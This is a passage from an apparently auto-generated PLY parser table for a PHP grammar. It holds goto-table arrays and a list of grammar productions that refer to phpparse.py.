1,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,101,]),'variable_without_objects':([2,9,19,23,24,25,28,32,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,304,336,351,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,477,479,485,487,488,489,490,491,499,501,528,532,533,535,537,540,545,556,557,559,560,616,617,629,679,682,693,742,746,748,751,752,763,790,796,797,803,806,814,822,826,861,868,881,883,884,907,912,914,934,937,938,940,964,972,975,],[102,1
02,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,428,431,102,102,102,102,102,102,102,102,102,102,102,102,102,102,527,302,531,102,102,428,431,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,302,102,302,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,102,]),'reference_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,790,796,797,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[104,104,104,104,104,104,104,104,214,104,104,104,104,104,104,234,234,104,104,104,104,104,104,104,104,104,104,104,104,104,104,271,104,104,104,271,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,104,234,234,104,104,104,104,104,104,104,104,104,104,104,104,104,234,104,234,234,104,104,104,271,271,271,104,104,104,104,104,234,104,472,104,104,104,472,104,104,1
04,104,271,271,271,104,104,271,271,104,234,104,104,104,104,104,104,472,472,472,472,104,104,104,104,104,104,104,234,234,104,472,104,104,234,234,234,234,234,104,104,104,104,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,472,104,104,234,472,104,104,104,472,472,104,104,104,234,234,104,472,472,472,271,234,271,104,104,104,104,104,472,472,472,104,104,104,104,104,472,104,104,104,472,472,104,104,104,104,104,104,104,]),'compound_variable':([2,9,19,23,24,25,28,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,105,119,120,129,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,173,179,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,256,260,261,265,267,268,270,277,284,291,294,304,336,351,354,356,360,375,389,391,394,395,404,407,410,411,423,424,425,429,432,442,444,446,455,456,457,468,477,479,485,487,488,489,490,491,499,501,503,528,532,533,535,537,540,545,556,557,559,560,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,616,617,629,646,679,682,693,734,735,742,746,748,751,752,763,764,771,773,790,796,797,803,806,814,822,826,839,851,860,861,868,881,883,884,894,907,912,914,924,928,934,937,938,940,964,972,975,],[106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,10
6,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,106,]),'inner_statement_list':([13,180,614,622,640,832,835,836,871,874,908,911,913,955,962,967,],[120,360,742,746,763,881,883,884,912,914,937,938,940,964,972,975,]),'constant_declarations':([14,],[122,]),'constant_declaration':([14,293,],[123,451,]),'use_declarations':([15,],[125,]),'use_declaration':([15,296,],[126,474,]),'global_var_list':([26,],[170,]),'global_var':([26,349,],[171,493,]),'static_var_list':([27,],[174,]),'static_var':([27,353,],[175,495,]),'echo_expr_list':([28,],[177,]),'is_reference':([34,110,784,842,],[183,274,848,889,]),'class_name_reference':([40,],[206,]),'dynamic_class_name_reference':([40,],[208,]),'array_pair_list':([45,218,],[219,401,]),'non_empty_array_pair_list':([45,218,],[221,221,]),'encaps_list':([76,98,103,186,],[257,262,266,366,]),'nowdoc_text_content':([99,],[263,]),'function_call_parameter_list':([119,265,389,425,444,479,556,557,559,560,803,806,],[280,436,526,555,567,615,696,697,699,700,858,859,]),'function_call_parameter':([119,265,389,425,444,446,479,556,557,559,560,803,806,],[281,281,281,281,281,568,281,281,281,281,281,281,281,]),'inner_statement':([120,360,742,746,763,881,883,884,912,914,937,938,940,964,972,975,],[286,286,286,286,286,286,286,286,286,286,286,286,286,286,286,286,]),'object_property':([131,256,394,790,797,],[300,418,530,854,856,]),'variable_name':([131,256,394,790,797,],[301,301,301,301,301,]),'dim_offset':([132,205,267,616,],[307,387,438,744,]),'for_expr':([161,489,748,],[339,624,821,]),'non_empty_for_expr':([161,489,748,],[341,341,341,]),'unset_variables':([179,],[357,]),'unset_variable':([179,499,],[358,635,]),'declare_list':([182,],[362,]),'extends_from':([188,],[367,]),'interface_extends_list':([189,],[370,]),'ctor_arguments':([206,],[388,]),'assignment_list':([217,533,752,],[397,678,824,]),'
assignment_list_element':([217,533,535,752,],[398,398,680,398,]),'possible_comma':([221,605,],[403,733,]),'isset_variables':([244,],[412,]),'encaps_var':([257,262,266,366,],[420,420,420,420,]),'static_expr':([294,457,468,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,734,735,860,894,924,],[453,597,606,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,606,808,810,904,926,945,]),'static_scalar':([294,354,455,456,457,468,503,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,646,734,735,764,771,773,839,851,860,894,924,928,],[454,496,595,596,454,607,642,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,454,607,770,809,454,834,838,840,888,897,454,454,454,948,]),'static_heredoc':([294,354,455,456,457,468,503,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,646,734,735,764,771,773,839,851,860,894,924,928,],[461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,461,]),'method_or_not':([300,418,856,],[478,549,900,]),'object_dim_list':([301,],[481,]),'parameter_list':([365,504,927,944,],[505,643,947,957,]),'parameter':([365,504,645,927,944,],[506,506,769,506,506,]),'implements_list':([367,],[512,]),'fully_qualified_class_name':([369,371,513,656,661,781,831,898,925,],[515,521,521,783,787,846,880,929,929,]),'interface_list':([371,513,],[520,651,]),'trait_statement_list':([373,],[522,]),'static_array_pair_list':([468,602,],[603,731,]),'static_non_empty_array_pair_list':([468,602,],[605,605,]),'multiple_encapsed':([471,],[610,]),'while_statement':([487,],[620,]),'foreach_variable':([491,751,],[626,823,]),'switch_case_list':([492,],[630,]),'additional_catches':([500,],[636,]),'declare_statement':([501,],[638,]),'class_statement_
list':([519,650,],[654,774,]),'trait_statement':([522,],[658,]),'method_modifiers':([522,654,774,],[659,778,778,]),'variable_modifiers':([522,654,774,],[660,779,779,]),'non_empty_member_modifiers':([522,654,774,],[662,662,662,]),'member_modifier':([522,654,662,774,],[665,665,788,665,]),'visibility_modifier':([522,654,662,774,950,],[666,666,666,666,961,]),'dynamic_class_name_variable_properties':([530,],[675,]),'variable_properties':([549,],[685,]),'encaps_var_offset':([550,],[688,]),'elseif_list':([613,],[740,]),'foreach_optional_arg':([626,],[749,]),'case_list':([631,632,755,758,],[754,757,828,830,]),'maybe_finally':([636,],[759,]),'lexical_vars':([644,],[766,]),'class_statement':([654,774,],[777,777,]),'class_constant_declaration':([654,774,],[780,780,]),'class_variable_declaration':([660,779,],[785,843,]),'dynamic_class_name_variable_property':([675,],[791,]),'variable_property':([685,],[798,]),'else_single':([740,],[811,]),'new_elseif_list':([742,],[815,]),'new_else_single':([815,],[863,]),'foreach_statement':([822,],[869,]),'case_separator':([827,873,],[874,913,]),'lexical_var_list':([837,],[885,]),'trait_modifiers_list':([852,892,],[898,925,]),'for_statement':([868,],[909,]),'trait_modifier':([898,925,],[931,931,]),'trait_member':([898,925,],[932,932,]),'method_body':([958,965,],[966,974,]),}
_lr_goto = {}
for _k, _v in _lr_goto_items.items():
    for _x, _y in zip(_v[0], _v[1]):
        # Rebuild the goto table keyed by state, then by nonterminal.
        _lr_goto.setdefault(_x, {})[_k] = _y
del _lr_goto_items
_lr_productions = [
("S' -> start","S'",1,None,None,None),
('start -> top_statement_list','start',1,'p_start','phpparse.py',90),
('top_statement_list -> top_statement_list top_statement','top_statement_list',2,'p_top_statement_list','phpparse.py',94),
('top_statement_list -> empty','top_statement_list',1,'p_top_statement_list','phpparse.py',95),
('top_statement -> statement','top_statement',1,'p_top_statement','phpparse.py',102),
('top_statement -> function_declaration_statement','top_statement',1,'p_top_statement','phpparse.py',103),
('top_statement -> class_declaration_statement','top_statement',1,'p_top_statement','phpparse.py',104),
('top_statement -> HALT_COMPILER LPAREN RPAREN SEMI','top_statement',4,'p_top_statement','phpparse.py',105),
('top_statement -> NAMESPACE namespace_name SEMI','top_statement',3,'p_top_statement_namespace','phpparse.py',113),
('top_statement -> NAMESPACE LBRACE top_statement_list RBRACE','top_statement',4,'p_top_statement_namespace','phpparse.py',114),
('top_statement -> NAMESPACE namespace_name LBRACE top_statement_list RBRACE','top_statement',5,'p_top_statement_namespace','phpparse.py',115),
('top_statement -> CONST constant_declarations SEMI','top_statement',3,'p_top_statement_constant','phpparse.py',124),
('top_statement -> USE use_declarations SEMI','top_statement',3,'p_top_statement_use','phpparse.py',128),
('use_declarations -> use_declarations COMMA use_declaration','use_declarations',3,'p_use_declarations','phpparse.py',132),
('use_declarations -> use_declaration','use_declarations',1,'p_use_declarations','phpparse.py',133),
('use_declaration -> namespace_name','use_declaration',1,'p_use_declaration','phpparse.py',140),
('use_declaration -> NS_SEPARATOR namespace_name','use_declaration',2,'p_use_declaration','phpparse.py',141),
('use_declaration -> namespace_name AS STRING','use_declaration',3,'p_use_declaration','phpparse.py',142),
('use_declaration -> NS_SEPARATOR namespace_name AS STRING','use_declaration',4,'p_use_declaration','phpparse.py',143),
('constant_declarations -> constant_declarations COMMA constant_declaration','constant_declarations',3,'p_constant_declarations','phpparse.py',154),
('constant_declarations -> constant_declaration','constant_declarations',1,'p_constant_declarations','phpparse.py',155),
('constant_declaration -> STRING EQUALS static_expr','constant_declaration',3,'p_constant_declaration','phpparse.py',162),
('inner_statement_list -> inner_statement_list inner_statement','inner_statement_list',2,'p_inner_statement_list','phpparse.py',166),
('inner_statement_list -> empty','inner_statement_list',1,'p_inner_statement_list','phpparse.py',167),
('inner_statement -> statement','inner_statement',1,'p_inner_statement','phpparse.py',174),
('inner_statement -> function_declaration_statement','inner_statement',1,'p_inner_statement','phpparse.py',175),
('inner_statement -> class_declaration_statement','inner_statement',1,'p_inner_statement','phpparse.py',176),
('inner_statement -> HALT_COMPILER LPAREN RPAREN SEMI','inner_statement',4,'p_inner_statement','phpparse.py',177),
('inner_statement -> YIELD SEMI','inner_statement',2,'p_inner_statement_yield','phpparse.py',182),
('inner_statement -> YIELD expr SEMI','inner_statement',3,'p_inner_statement_yield','phpparse.py',183),
('statement -> LBRACE inner_statement_list RBRACE','statement',3,'p_statement_block','phpparse.py',190),
('statement -> IF LPAREN expr RPAREN statement elseif_list else_single','statement',7,'p_statement_if','phpparse.py',194),
('statement -> IF LPAREN expr RPAREN COLON inner_statement_list new_elseif_list new_else_single ENDIF SEMI','statement',10,'p_statement_if','phpparse.py',195),
('statement -> WHILE LPAREN expr RPAREN while_statement','statement',5,'p_statement_while','phpparse.py',203),
('statement -> DO statement WHILE LPAREN expr RPAREN SEMI','statement',7,'p_statement_do_while','phpparse.py',207),
('statement -> FOR LPAREN for_expr SEMI for_expr SEMI for_expr RPAREN for_statement','statement',9,'p_statement_for','phpparse.py',211),
('statement -> FOREACH LPAREN expr AS foreach_variable foreach_optional_arg RPAREN foreach_statement','statement',8,'p_statement_foreach','phpparse.py',215),
('statement -> SWITCH LPAREN expr RPAREN switch_case_list','statement',5,'p_statement_switch','phpparse.py',222),
('statement -> BREAK SEMI','statement',2,'p_statement_break','phpparse.py',226),
('statement -> BREAK expr SEMI','statement',3,'p_statement_break','phpparse.py',227),
('statement -> CONTINUE SEMI','statement',2,'p_statement_continue','phpparse.py',234),
('statement -> CONTINUE expr SEMI','statement',3,'p_statement_continue','phpparse.py',235),
('statement -> RETURN SEMI','statement',2,'p_statement_return','phpparse.py',242),
('statement -> RETURN expr SEMI','statement',3,'p_statement_return','phpparse.py',243),
('statement -> GLOBAL global_var_list SEMI','statement',3,'p_statement_global','phpparse.py',250),
('statement -> STATIC static_var_list SEMI','statement',3,'p_statement_static','phpparse.py',254),
('statement -> ECHO echo_expr_list SEMI','statement',3,'p_statement_echo','phpparse.py',258),
('statement -> INLINE_HTML','statement',1,'p_statement_inline_html','phpparse.py',262),
('statement -> expr SEMI','statement',2,'p_statement_expr','phpparse.py',266),
('statement -> UNSET LPAREN unset_variables RPAREN SEMI','statement',5,'p_statement_unset','phpparse.py',270),
('statement -> SEMI','statement',1,'p_statement_empty','phpparse.py',274),
('statement -> TRY LBRACE inner_statement_list RBRACE additional_catches maybe_finally','statement',6,'p_statement_try','phpparse.py',278),
('additional_catches -> additional_catches CATCH LPAREN fully_qualified_class_name VARIABLE RPAREN LBRACE inner_statement_list RBRACE','additional_catches',9,'p_additional_catches','phpparse.py',282),
('additional_catches -> empty','additional_catches',1,'p_additional_catches','phpparse.py',283),
('maybe_finally -> FINALLY LBRACE inner_statement_list RBRACE','maybe_finally',4,'p_maybe_finally','phpparse.py',291),
('maybe_finally -> empty','maybe_finally',1,'p_maybe_finally','phpparse.py',292),
('statement -> THROW expr SEMI','statement',3,'p_statement_throw','phpparse.py',299),
('statement -> DECLARE LPAREN declare_list RPAREN declare_statement','statement',5,'p_statement_declare','phpparse.py',303),
('declare_list -> STRING EQUALS static_scalar','declare_list',3,'p_declare_list','phpparse.py',307),
('declare_list -> declare_list COMMA STRING EQUALS static_scalar','declare_list',5,'p_declare_list','phpparse.py',308),
('declare_statement -> statement','declare_statement',1,'p_declare_statement','phpparse.py',315),
('declare_statement -> COLON inner_statement_list ENDDECLARE SEMI','declare_statement',4,'p_declare_statement','phpparse.py',316),
('elseif_list -> empty','elseif_list',1,'p_elseif_list','phpparse.py',323),
('elseif_list -> elseif_list ELSEIF LPAREN expr RPAREN statement','elseif_list',6,'p_elseif_list','phpparse.py',324),
('else_single -> empty','else_single',1,'p_else_single','phpparse.py',331),
('else_single -> ELSE statement','else_single',2,'p_else_single','phpparse.py',332),
('new_elseif_list -> empty','new_elseif_list',1,'p_new_elseif_list','phpparse.py',337),
('new_elseif_list -> new_elseif_list ELSEIF LPAREN expr RPAREN COLON inner_statement_list','new_elseif_list',7,'p_new_elseif_list','phpparse.py',338),
('new_else_single -> empty','new_else_single',1,'p_new_else_single','phpparse.py',346),
('new_else_single -> ELSE COLON inner_statement_list','new_else_single',3,'p_new_else_single','phpparse.py',347),
('while_statement -> statement','while_statement',1,'p_while_statement','phpparse.py',353),
('while_statement -> COLON inner_statement_list ENDWHILE SEMI','while_statement',4,'p_while_statement','phpparse.py',354),
('for_expr -> empty','for_expr',1,'p_for_expr','phpparse.py',361),
('for_expr -> non_empty_for_expr','for_expr',1,'p_for_expr','phpparse.py',362),
('non_empty_for_expr -> non_empty_for_expr COMMA expr','non_empty_for_expr',3,'p_non_empty_for_expr','phpparse.py',366),
('non_empty_for_expr -> expr','non_empty_for_expr',1,'p_non_empty_for_expr','phpparse.py',367),
('for_statement -> statement','for_statement',1,'p_for_statement','phpparse.py',374),
('for_statement -> COLON inner_statement_list ENDFOR SEMI','for_statement',4,'p_for_statement','phpparse.py',375),
('foreach_variable -> LIST LPAREN assignment_list RPAREN','foreach_variable',4,'p_foreach_variable','phpparse.py',382),
('foreach_variable -> variable','foreach_variable',1,'p_foreach_variable','phpparse.py',383),
('foreach_variable -> AND variable','foreach_variable',2,'p_foreach_variable','phpparse.py',384),
('foreach_optional_arg -> empty','foreach_optional_arg',1,'p_foreach_optional_arg','phpparse.py',395),
('foreach_optional_arg -> DOUBLE_ARROW foreach_variable','foreach_optional_arg',2,'p_foreach_optional_arg','phpparse.py',396),
('foreach_statement -> statement','foreach_statement',1,'p_foreach_statement','phpparse.py',401),
('foreach_statement -> COLON inner_statement_list ENDFOREACH SEMI','foreach_statement',4,'p_foreach_statement','phpparse.py',402),
('switch_case_list -> LBRACE case_list RBRACE','switch_case_list',3,'p_switch_case_list','phpparse.py',409),
('switch_case_list -> LBRACE SEMI case_list RBRACE','switch_case_list',4,'p_switch_case_list','phpparse.py',410),
('switch_case_list -> COLON case_list ENDSWITCH SEMI','switch_case_list',4,'p_switch_case_list_colon','phpparse.py',417),
('switch_case_list -> COLON SEMI case_list ENDSWITCH SEMI','switch_case_list',5,'p_switch_case_list_colon','phpparse.py',418),
('case_list -> empty','case_list',1,'p_case_list','phpparse.py',425),
('case_list -> case_list CASE expr case_separator inner_statement_list','case_list',5,'p_case_list','phpparse.py',426),
('case_list -> case_list DEFAULT case_separator inner_statement_list','case_list',4,'p_case_list','phpparse.py',427),
('case_separator -> COLON','case_separator',1,'p_case_separator','phpparse.py',436),
('case_separator -> SEMI','case_separator',1,'p_case_separator','phpparse.py',437),
('global_var_list -> global_var_list COMMA global_var','global_var_list',3,'p_global_var_list','phpparse.py',441),
('global_var_list -> global_var','global_var_list',1,'p_global_var_list','phpparse.py',442),
('global_var -> VARIABLE','global_var',1,'p_global_var','phpparse.py',449),
('global_var -> DOLLAR variable','global_var',2,'p_global_var','phpparse.py',450),
('global_var -> DOLLAR LBRACE expr RBRACE','global_var',4,'p_global_var','phpparse.py',451),
('static_var_list -> static_var_list COMMA static_var','static_var_list',3,'p_static_var_list','phpparse.py',460),
('static_var_list -> static_var','static_var_list',1,'p_static_var_list','phpparse.py',461),
('static_var -> VARIABLE EQUALS static_scalar','static_var',3,'p_static_var','phpparse.py',468),
('static_var -> VARIABLE','static_var',1,'p_static_var','phpparse.py',469),
('echo_expr_list -> echo_expr_list COMMA expr','echo_expr_list',3,'p_echo_expr_list','phpparse.py',476),
('echo_expr_list -> expr','echo_expr_list',1,'p_echo_expr_list','phpparse.py',477),
('unset_variables -> unset_variables COMMA unset_variable','unset_variables',3,'p_unset_variables','phpparse.py',484),
('unset_variables -> unset_variable','unset_variables',1,'p_unset_variables','phpparse.py',485),
('unset_variable -> variable','unset_variable',1,'p_unset_variable','phpparse.py',492),
('function_declaration_statement -> FUNCTION is_reference STRING LPAREN parameter_list RPAREN LBRACE inner_statement_list RBRACE','function_declaration_statement',9,'p_function_declaration_statement','phpparse.py',496),
('class_declaration_statement -> class_entry_type STRING extends_from implements_list LBRACE class_statement_list RBRACE','class_declaration_statement',7,'p_class_declaration_statement','phpparse.py',500),
('class_declaration_statement -> INTERFACE STRING interface_extends_list LBRACE class_statement_list RBRACE','class_declaration_statement',6,'p_class_declaration_statement','phpparse.py',501),
('class_declaration_statement -> TRAIT STRING LBRACE trait_statement_list RBRACE','class_declaration_statement',5,'p_class_declaration_statement','phpparse.py',502),
('class_entry_type -> CLASS','class_entry_type',1,'p_class_entry_type','phpparse.py',525),
('class_entry_type -> ABSTRACT CLASS','class_entry_type',2,'p_class_entry_type','phpparse.py',526),
('class_entry_type -> FINAL CLASS','class_entry_type',2,'p_class_entry_type','phpparse.py',527),
('extends_from -> empty','extends_from',1,'p_extends_from','phpparse.py',532),
('extends_from -> EXTENDS fully_qualified_class_name','extends_from',2,'p_extends_from','phpparse.py',533),
('fully_qualified_class_name -> namespace_name','fully_qualified_class_name',1,'p_fully_qualified_class_name','phpparse.py',538),
('fully_qualified_class_name -> NS_SEPARATOR namespace_name','fully_qualified_class_name',2,'p_fully_qualified_class_name','phpparse.py',539),
('fully_qualified_class_name -> NAMESPACE NS_SEPARATOR namespace_name','fully_qualified_class_name',3,'p_fully_qualified_class_name','phpparse.py',540),
('implements_list -> IMPLEMENTS interface_list','implements_list',2,'p_implements_list','phpparse.py',549),
('implements_list -> empty','implements_list',1,'p_implements_list','phpparse.py',550),
('trait_modifiers_list -> trait_modifiers_list trait_modifier','trait_modifiers_list',2,'p_trait_modifiers_list','phpparse.py',557),
('trait_modifiers_list -> empty','trait_modifiers_list',1,'p_trait_modifiers_list','phpparse.py',558),
('trait_member -> fully_qualified_class_name DOUBLE_COLON STRING','trait_member',3,'p_trait_member','phpparse.py',565),
('trait_member -> STRING','trait_member',1,'p_trait_member','phpparse.py',566),
('trait_modifier -> trait_member AS STRING SEMI','trait_modifier',4,'p_trait_modifier','phpparse.py',573),
('trait_modifier -> trait_member AS visibility_modifier STRING SEMI','trait_modifier',5,'p_trait_modifier_with_visibility','phpparse.py',577),
('trait_modifier -> trait_member AS visibility_modifier SEMI','trait_modifier',4,'p_trait_modifier_with_visibility','phpparse.py',578),
('trait_statement_list -> trait_statement_list trait_statement','trait_statement_list',2,'p_trait_statement_list','phpparse.py',585),
('trait_statement_list -> empty','trait_statement_list',1,'p_trait_statement_list','phpparse.py',586),
('trait_statement -> method_modifiers FUNCTION is_reference STRING LPAREN parameter_list RPAREN method_body','trait_statement',8,'p_trait_statement','phpparse.py',594),
('trait_statement -> variable_modifiers class_variable_declaration SEMI','trait_statement',3,'p_trait_statement','phpparse.py',595),
('trait_statement -> USE fully_qualified_class_name LBRACE trait_modifiers_list RBRACE','trait_statement',5,'p_trait_statement','phpparse.py',596),
('trait_statement -> USE fully_qualified_class_name SEMI','trait_statement',3,'p_trait_statement','phpparse.py',597),
('class_statement_list -> class_statement_list class_statement','class_statement_list',2,'p_class_statement_list','phpparse.py',609),
('class_statement_list -> empty','class_statement_list',1,'p_class_statement_list','phpparse.py',610),
('class_statement -> method_modifiers FUNCTION is_reference STRING LPAREN parameter_list RPAREN method_body','class_statement',8,'p_class_statement','phpparse.py',618),
('class_statement -> variable_modifiers class_variable_declaration SEMI','class_statement',3,'p_class_statement','phpparse.py',619),
('class_statement -> class_constant_declaration SEMI','class_statement',2,'p_class_statement','phpparse.py',620),
('class_statement -> USE fully_qualified_class_name LBRACE trait_modifiers_list RBRACE','class_statement',5,'p_class_statement','phpparse.py',621),
('class_statement -> USE fully_qualified_class_name SEMI','class_statement',3,'p_class_statement','phpparse.py',622),
('class_variable_declaration -> class_variable_declaration COMMA VARIABLE EQUALS static_scalar','class_variable_declaration',5,'p_class_variable_declaration_initial','phpparse.py',636),
('class_variable_declaration -> VARIABLE EQUALS static_scalar','class_variable_declaration',3,'p_class_variable_declaration_initial','phpparse.py',637),
('class_variable_declaration -> class_variable_declaration COMMA VARIABLE','class_variable_declaration',3,'p_class_variable_declaration_no_initial','phpparse.py',644),
('class_variable_declaration -> VARIABLE','class_variable_declaration',1,'p_class_variable_declaration_no_initial','phpparse.py',645),
('class_constant_declaration -> class_constant_declaration COMMA STRING EQUALS static_expr','class_constant_declaration',5,'p_class_constant_declaration','phpparse.py',652),
('class_constant_declaration -> CONST STRING EQUALS static_expr','class_constant_declaration',4,'p_class_constant_declaration','phpparse.py',653),
('interface_list -> interface_list COMMA fully_qualified_class_name','interface_list',3,'p_interface_list','phpparse.py',660),
('interface_list -> fully_qualified_class_name','interface_list',1,'p_interface_list','phpparse.py',661),
('interface_extends_list -> EXTENDS interface_list','interface_extends_list',2,'p_interface_extends_list','phpparse.py',668),
('interface_extends_list -> empty','interface_extends_list',1,'p_interface_extends_list','phpparse.py',669),
('variable_modifiers -> non_empty_member_modifiers','variable_modifiers',1,'p_variable_modifiers_non_empty','phpparse.py',674),
('variable_modifiers -> VAR','variable_modifiers',1,'p_variable_modifiers_var','phpparse.py',678),
('method_modifiers -> non_empty_member_modifiers','method_modifiers',1,'p_method_modifiers_non_empty','phpparse.py',682),
('method_modifiers -> empty','method_modifiers',1,'p_method_modifiers_empty','phpparse.py',686),
('method_body -> LBRACE inner_statement_list RBRACE','method_body',3,'p_method_body','phpparse.py',690),
('method_body -> SEMI','method_body',1,'p_method_body','phpparse.py',691),
('non_empty_member_modifiers -> non_empty_member_modifiers member_modifier','non_empty_member_modifiers',2,'p_non_empty_member_modifiers','phpparse.py',698),
('non_empty_member_modifiers -> member_modifier','non_empty_member_modifiers',1,'p_non_empty_member_modifiers','phpparse.py',699),
('visibility_modifier -> PUBLIC','visibility_modifier',1,'p_visibility_modifier','phpparse.py',706),
('visibility_modifier -> PROTECTED','visibility_modifier',1,'p_visibility_modifier','phpparse.py',707),
('visibility_modifier -> PRIVATE','visibility_modifier',1,'p_visibility_modifier','phpparse.py',708),
('member_modifier -> visibility_modifier','member_modifier',1,'p_member_modifier','phpparse.py',712),
('member_modifier -> STATIC','member_modifier',1,'p_member_modifier','phpparse.py',713),
('member_modifier -> ABSTRACT','member_modifier',1,'p_member_modifier','phpparse.py',714),
('member_modifier -> FINAL','member_modifier',1,'p_member_modifier','phpparse.py',715),
('is_reference -> AND','is_reference',1,'p_is_reference','phpparse.py',719),
('is_reference -> empty','is_reference',1,'p_is_reference','phpparse.py',720),
('parameter_list -> parameter_list COMMA parameter','parameter_list',3,'p_parameter_list','phpparse.py',724),
('parameter_list -> parameter','parameter_list',1,'p_parameter_list','phpparse.py',725),
('parameter_list -> empty','parameter_list',1,'p_parameter_list_empty','phpparse.py',732),
('parameter -> VARIABLE','parameter',1,'p_parameter','phpparse.py',736),
('parameter -> class_name VARIABLE','parameter',2,'p_parameter','phpparse.py',737),
('parameter -> AND VARIABLE','parameter',2,'p_parameter','phpparse.py',738),
('parameter -> class_name AND VARIABLE','parameter',3,'p_parameter','phpparse.py',739),
('parameter -> VARIABLE EQUALS static_scalar','parameter',3,'p_parameter','phpparse.py',740),
('parameter -> class_name VARIABLE EQUALS static_scalar','parameter',4,'p_parameter','phpparse.py',741),
('parameter -> AND VARIABLE EQUALS static_scalar','parameter',4,'p_parameter','phpparse.py',742),
('parameter -> class_name AND VARIABLE EQUALS static_scalar','parameter',5,'p_parameter','phpparse.py',743),
('expr -> variable','expr',1,'p_expr_variable','phpparse.py',762),
('expr -> variable EQUALS expr','expr',3,'p_expr_assign','phpparse.py',766),
('expr -> variable EQUALS AND expr','expr',4,'p_expr_assign','phpparse.py',767),
('expr -> NEW class_name_reference ctor_arguments','expr',3,'p_expr_new','phpparse.py',774),
('expr -> expr OBJECT_OPERATOR object_property method_or_not','expr',4,'p_expr_objectop','phpparse.py',778),
('class_name_reference -> class_name','class_name_reference',1,'p_class_name_reference','phpparse.py',788),
('class_name_reference -> dynamic_class_name_reference','class_name_reference',1,'p_class_name_reference','phpparse.py',789),
('class_name -> namespace_name','class_name',1,'p_class_name','phpparse.py',793),
('class_name -> NS_SEPARATOR namespace_name','class_name',2,'p_class_name','phpparse.py',794),
('class_name -> NAMESPACE NS_SEPARATOR namespace_name','class_name',3,'p_class_name','phpparse.py',795),
('class_name -> STATIC','class_name',1,'p_class_name_static','phpparse.py',804),
('dynamic_class_name_reference -> base_variable OBJECT_OPERATOR object_property dynamic_class_name_variable_properties','dynamic_class_name_reference',4,'p_dynamic_class_name_reference','phpparse.py',808),
('dynamic_class_name_reference -> base_variable','dynamic_class_name_reference',1,'p_dynamic_class_name_reference','phpparse.py',809),
('dynamic_class_name_variable_properties -> dynamic_class_name_variable_properties dynamic_class_name_variable_property','dynamic_class_name_variable_properties',2,'p_dynamic_class_name_variable_properties','phpparse.py',823),
('dynamic_class_name_variable_properties -> empty','dynamic_class_name_variable_properties',1,'p_dynamic_class_name_variable_properties','phpparse.py',824),
('dynamic_class_name_variable_property -> OBJECT_OPERATOR object_property','dynamic_class_name_variable_property',2,'p_dynamic_class_name_variable_property','phpparse.py',831),
('ctor_arguments -> LPAREN function_call_parameter_list RPAREN','ctor_arguments',3,'p_ctor_arguments','phpparse.py',835),
('ctor_arguments -> empty','ctor_arguments',1,'p_ctor_arguments','phpparse.py',836),
